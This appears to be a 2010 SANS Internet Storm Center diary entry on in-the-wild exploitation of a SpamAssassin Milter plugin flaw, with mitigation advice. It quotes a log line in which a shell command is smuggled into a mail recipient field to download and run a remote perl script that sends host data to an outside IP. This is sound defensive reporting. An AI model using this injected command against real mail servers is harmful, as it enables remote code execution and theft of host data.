Newsfeed
(click to hide)
Last 10
- Vuln: Libpng 'png_decompress_chunk()' Function Denial of Service Vulnerability
- Vuln: GNU Tar and GNU Cpio Remote Buffer Overflow Vulnerability
- Vuln: ViewVC 'lib/viewvc.py' Cross Site Scripting Vulnerability
- Cybercrime losses almost double
- Vuln: Yahoo! Player Playlist Processing Buffer Overflow Vulnerability
- Spamassassin Milter Plugin Remote Root Attack, (Mon, Mar 15th)
- Typosquatting
- Vuln: Joomla! 'com_juliaportfolio' Component 'controller' Parameter Local File Include Vulnerability
- Vuln: Joomla! 'com_d-greinar' Component 'maintree' Parameter Cross-Site Scripting Vulnerability
- IT contractors convicted of UK casino hack scam
SANS Newsbites
SANS @Risk
Today´s Diary
If you have more information or corrections regarding our diary, please share.
Last Updated: 2010-03-15 14:07:20 UTC
by Adrien de Beaupre (Version: 2)
Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:
Messages rejected to recipient: root+:|wget
hxxp://www.linux-echo.de/.x/p.txt;perl p.txt: smtp.target.com[10.11.17.18] : User unknown in local recipient
table; from=<blue@attacker.com> to=<root+:|wget
hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)
Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).
The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.
Update: SecurityFocus BID 38578
Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136
Alternatively, don't use the -x option when running this plugin, as well do not run it as root.
Cheers,
Adrien de Beaupré
EWA-Canada.com
If you have more information or corrections regarding our diary, click here to contact us.
Diary Archive
| Date | Author | Title |
|---|---|---|
| 2010-03-15 | Adrien de Beaupre | Spamassassin Milter Plugin Remote Root Attack |
| 2010-03-14 | Marcus Sachs | DST Issue in Windows 7 Ultimate? |
| 2010-03-13 | Marcus Sachs | Evil Sports Sites |
| 2010-03-11 | donald smith | Cert write up on Skype IMBot Logic and Functionality. |
| 2010-03-11 | donald smith | Interesting SKYPE SPIM. |
| 2010-03-10 | Rob VandenBrink | What's My Firewall Telling Me? (Part 4) |
| 2010-03-10 | Rob VandenBrink | Microsoft Security Advisory 981374 - Remote Code Execution Vulnerability for IE6 and IE7 |
| 2010-03-09 | John Bambenek | Vodafone Android Phone: Complete with Mariposa Malware |
| 2010-03-09 | John Bambenek | March 2010 - Microsoft Patch Tuesday Diary |
| 2010-03-09 | Marcus Sachs | Energizer Malware |
Search Diaries:
NEW: ISC/DShield Discussion Group
|
|
| Subscribe to SANS Internet Storm Center / DShield |
| Visit this group |
Featured Event
Latest Reading Room Papers
Poll
Trends
more details
World Map

